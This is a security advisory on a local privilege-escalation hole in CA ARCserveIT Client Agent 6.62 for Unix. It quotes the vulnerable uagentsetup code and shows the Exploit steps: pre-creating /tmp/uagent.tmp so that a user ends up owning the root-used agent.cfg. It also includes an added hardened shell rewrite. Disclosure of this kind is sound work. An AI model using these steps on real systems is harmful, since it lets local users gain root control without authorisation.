Client Agent 6.62 for Unix Vulnerability
Tested on a Debian 2.2.14

Introduction
--------------

Client Agent has a hole that allows arbitrary code to be executed by root
without root knowing it. However, some conditions must be met to exploit
this vulnerability.

Description
------------

Client Agent is used with ARCserveIT, the backup software. It must be
installed on all the workstations. A global configuration file, agent.cfg,
lists every sub-agent installed on your system. This file is in
/usr/CYEagent and receives the information from the sub-agent when the
script /opt/uagent/uagentsetup is run.

agent.cfg:

debian:/usr/CYEagent# more agent.cfg
#
#(c) Copyright 1989-1999 Computer Associates International, Inc.
#and/or its subsidiaries. All Rights Reserved. Use by the United
#States Government is subject to RESTRICTED RIGHTS as set out in
#the license agreement.
#
[0]
#[UAGENT]
NAME Uagent
VERSION 5.0.0
HOME /opt/uagent
#ENV CHEY_ENV_DEBUG_LEVEL=4
ENV LD_LIBRARY_PATH=/usr/local/CAlib:/usr/CYEagent:$LD_LIBRARY_PATH
ENV SHLIB_PATH=/usr/local/CAlib:/usr/CYEagent:$SHLIB_PATH
ENV LIBPATH=/usr/local/CAlib:/usr/CYEagent:$LIBPATH
BROWSER asbr
AGENT uagentd
MERGE umrgd
VERIFY umrgd

where asbr, uagentd, and umrgd are programs in /opt/uagent.

Client Agent is vulnerable only if uagentsetup is run a second time. On the
first run, it creates the directory /usr/CYEagent and the file agent.cfg.
On later runs, it creates a backup of agent.cfg and then creates a new
agent.cfg without checking permissions.

The code in /opt/uagent/uagentsetup:

# append lines
#
case $ANS in
y|Y|yes|YES|Yes)
    cat ${UAGENT_HOME}/.agent.cfg >> ${TMPFILE} || exit 2
    ${ECHO} >> ${TMPFILE} || exit 2
    mv ${TMPFILE} $dest || exit 2     <------------
    ;;
esac

So anyone can control this file. Modifications to this file take effect
when the sub-agent is stopped and restarted.

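A hardened form of the append-and-replace step above, as an added example that is not part of the original advisory or of the vendor's script. The function names safe_append_cfg and cfg_is_trusted are hypothetical, and seeding the temporary file from the current agent.cfg is an assumption about the part of uagentsetup the excerpt does not show.

```sh
#!/bin/sh
# Added example, not Computer Associates' code. "dest" and ".agent.cfg" come
# from the excerpt; safe_append_cfg and cfg_is_trusted are hypothetical names.

# cfg_is_trusted FILE OWNER: succeed only if FILE is a regular file (not a
# symlink), owned by OWNER, and not writable by group or others.
cfg_is_trusted() {
    [ -n "$(find "$1" -prune -type f -user "$2" \
            ! -perm -020 ! -perm -002 2>/dev/null)" ]
}

# safe_append_cfg SRC DEST: rebuild DEST as "current DEST + SRC + blank line"
# without going through a predictable file name in a shared directory.
safe_append_cfg() {
    src=$1
    dest=$2
    # Never replace through a symlink planted at the destination.
    [ ! -L "$dest" ] || return 2
    # mktemp picks an unpredictable name and creates the file exclusively
    # (mode 0600, owned by the caller), so a file pre-created by another user
    # is never reused. Placing it beside DEST keeps mv a plain rename.
    tmp=$(mktemp "$(dirname "$dest")/.agent.cfg.XXXXXX") || return 2
    {
        # Assumption: the part of uagentsetup not shown in the advisory seeds
        # the temporary file with the current configuration.
        if [ -f "$dest" ]; then cat "$dest"; fi
        cat "$src" && echo
    } > "$tmp" || { rm -f "$tmp"; return 2; }
    chmod 644 "$tmp" || { rm -f "$tmp"; return 2; }
    mv -f "$tmp" "$dest" || { rm -f "$tmp"; return 2; }
    # Final gate: what is now in place must belong to the invoking user.
    cfg_is_trusted "$dest" "$(id -u)"
}
```

Running cfg_is_trusted /usr/CYEagent/agent.cfg root before the sub-agent is restarted flags the state shown in the listing below, where agent.cfg is no longer owned by root.
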
Exploit
--------

[zorgon@debian /]$ cd /tmp
[zorgon@debian /tmp]$ touch uagent.tmp
[zorgon@debian /tmp]$ chmod 700 uagent.tmp

If uagentsetup is run a second time:

[zorgon@debian /]$ ls -lag /usr/CYEagent/
total 176
drwxr-xr-x   3 root   root    4096 Jul 19 17:46 .
drwxr-xr-x  15 root   root    4096 Jul 11 10:37 ..
-rw-r--r--   1 zorgon users    618 Jul 19 17:47 agent.cfg
-rw-r--r--   1 root   root     618 Jul 19 17:47 agent.cfg.old
-rwxr-xr-x   1 root   root   16899 Jul 11 10:37 asagent
-rwxr-xr-x   1 root   root  105280 Jul 11 10:37 asagentd
lrwxrwxrwx   1 root   root      11 Jul 12 10:54 li -> /usr/lib/li
-rwxr-xr-x   1 root   root   27878 Jul 19 17:47 libarclic98_api.so
drwxr-xr-x   3 root   root    4096 Jul 11 10:37 nls
[zorgon@debian /]$

==================================
zorgon
http://www.nightbird.free.fr